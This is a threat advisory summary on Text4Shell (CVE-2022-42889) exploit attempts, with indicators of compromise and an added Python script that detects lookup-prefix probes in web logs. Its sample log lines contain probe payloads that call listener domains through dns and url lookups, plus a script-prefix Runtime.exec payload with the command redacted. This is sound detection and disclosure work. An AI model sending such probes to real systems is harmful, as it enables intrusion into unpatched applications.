Threat Advisory: Monitoring CVE-2022-42889 “Text4Shell” Exploit Attempts

Wordfence Threat Intelligence monitored exploit attempts targeting CVE-2022-42889, aka Text4Shell, across millions of sites and observed payloads in DNS, script, and URL prefixes aimed at remote code execution. Most activity leverages DNS prefix probes to contact attacker-controlled listener domains, with some payloads designed to trigger actual code execution via script payloads and listener callbacks.
#Text4Shell #CVE-2022-42889 #ApacheCommonsText #Interactsh #Canarytokens #Wordfence

Keypoints

  • Text4Shell is a remote code execution vulnerability in Apache Commons Text versions 1.5–1.9; it was patched in 1.10.0.
  • Wordfence began monitoring for CVE-2022-42889 activity on Oct 18, 2022 across a network of about 4 million websites.
  • The majority of observed payloads appear in DNS prefix form and are used to scan for vulnerable installations; a successful attempt would cause the victim site to query attacker-controlled domains.
  • Script prefix payloads can execute code (e.g., using Java code) to perform actions like contacting a listener or running commands.
  • DNS, script, and URL prefixes each have different roles, with DNS being the most common probe method and URL prefix being the least common.
  • Tracked indicators include a long list of IPs and numerous listener domains (e.g., tress.cf, oast.online, canarytokens.com), indicating broad scanning and potential C2 callbacks.
  • Wordfence Intelligence IP Threat Feed updates hourly with new observed RCE activity related to this CVE; Ramuel Gall authored the article.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – Remote code execution enabled by Text4Shell; ‘Text4Shell is a vulnerability in the Apache Commons Text library versions 1.5 through 1.9 that can be used to achieve remote code execution.’
  • [T1071.004] Application Layer Protocol: DNS – DNS prefix payloads cause the victim to contact attacker-controlled listener domains; ‘The vast majority of requests we are seeing are using the DNS prefix … a successful attempt would result in the victim site making a DNS query to the attacker-controlled listener domain.’
  • [T1059.007] Java – Script payloads invoke Java code to run commands; ‘…java.lang.Runtime.getRuntime().exec(…)’ (as shown in the payload example)
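The keypoints and the MITRE mapping above describe the three Apache Commons Text lookup prefixes (dns, script, url) seen in CVE-2022-42889 probes and the listener domains they call back to. The following detection script is an added example, not code from the Wordfence article: it scans web-server access log lines for interpolation markers using those prefixes, URL-decodes repeatedly so double-encoded probes are not missed, extracts the host a dns or url lookup would contact, and flags hosts that fall under the listener domains named in this advisory. The log format (Apache combined) and every sample log line are assumptions constructed for the example; the listener domains are the ones listed on this page.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Listener domains named in the advisory; used here for IoC matching.
KNOWN_LISTENER_DOMAINS = {
    "tress.cf", "oast.online", "oast.site", "oast.live", "oast.me", "canarytokens.com",
}

# ${prefix:body} markers for the Commons Text lookups abused by CVE-2022-42889.
LOOKUP_RE = re.compile(r"\$\{\s*(dns|script|url)\s*:([^}]*)\}", re.IGNORECASE)

# Apache combined log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def fully_decode(value, max_rounds=3):
    """URL-decode until the string stops changing (catches double-encoded payloads)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def listener_domain(prefix, body):
    """Return the host a dns/url/script lookup would contact, or None if not derivable."""
    if prefix == "dns" and "|" in body:
        # ${dns:address|host} resolves the host on the victim
        return body.split("|", 1)[1].strip().lower()
    if prefix in ("url", "script"):
        # ${url:UTF-8:http://host/...} fetches the URL; script bodies may embed one too
        match = re.search(r"https?://([^/\s:'\"]+)", body, re.IGNORECASE)
        return match.group(1).lower() if match else None
    return None


def matches_known_listener(host):
    """True if host is, or is a subdomain of, a listener domain from the advisory."""
    if not host:
        return False
    return any(host == d or host.endswith("." + d) for d in KNOWN_LISTENER_DOMAINS)


def scan_request(raw_target):
    """Find every dangerous lookup marker in one request target (path + query)."""
    findings = []
    for match in LOOKUP_RE.finditer(fully_decode(raw_target)):
        prefix = match.group(1).lower()
        host = listener_domain(prefix, match.group(2))
        findings.append({
            "prefix": prefix,
            "host": host,
            "known_listener": matches_known_listener(host),
        })
    return findings


def scan_log(lines):
    """Run scan_request over each parsable log line; return one alert per marker found."""
    alerts = []
    for line in lines:
        parsed = LOG_RE.match(line)
        if not parsed:
            continue
        for finding in scan_request(parsed.group("target")):
            alerts.append({"ip": parsed.group("ip"), **finding})
    return alerts


def count_by_prefix(alerts):
    """Tally alerts per prefix, e.g. to confirm dns probes dominate as the advisory reports."""
    return dict(Counter(a["prefix"] for a in alerts))


# Constructed sample log lines (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Oct/2022:12:00:01 +0000] "GET /?q=%24%7Bdns%3Aaddress%7Cabc123.oast.online%7D HTTP/1.1" 200 512',
    '203.0.113.9 - - [18/Oct/2022:12:00:02 +0000] "GET /index.php?s=${script:javascript:java.lang.Runtime.getRuntime().exec(\'[redacted]\')} HTTP/1.1" 404 0',
    '192.0.2.44 - - [18/Oct/2022:12:00:03 +0000] "POST /login?next=${url:UTF-8:http://listener.example/x} HTTP/1.1" 200 88',
    '192.0.2.45 - - [18/Oct/2022:12:00:04 +0000] "GET /blog/text4shell-advisory HTTP/1.1" 200 2048',
    '198.51.100.8 - - [18/Oct/2022:12:00:05 +0000] "GET /?x=%2524%257Bdns%253Aaddress%257Cprobe.tress.cf%257D HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print(count_by_prefix(found))
```

The decoder stops after three rounds on purpose: it is enough for the single- and double-encoded forms seen in scanning traffic, while bounding work on hostile input. A request whose marker carries a known listener domain is a stronger signal than the marker alone, but any `${dns:`, `${script:` or `${url:` marker in user-supplied input is worth an alert on an application that bundles Apache Commons Text 1.5 through 1.9.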

Indicators of Compromise

  • [IP Address] IP addresses observed sending requests targeting the vulnerability – 103.127.158.166*, 13.53.121.211*, and many more (see full list in article).
  • [Domain] Attacker-controlled listener and related domains – tress.cf, oast.online, oast.site, canarytokens.com, and other listed listeners (e.g., oast.live, oast.me).

Read more: https://www.wordfence.com/blog/2022/10/threat-advisory-monitoring-cve-2022-42889-text4shell-exploit-attempts/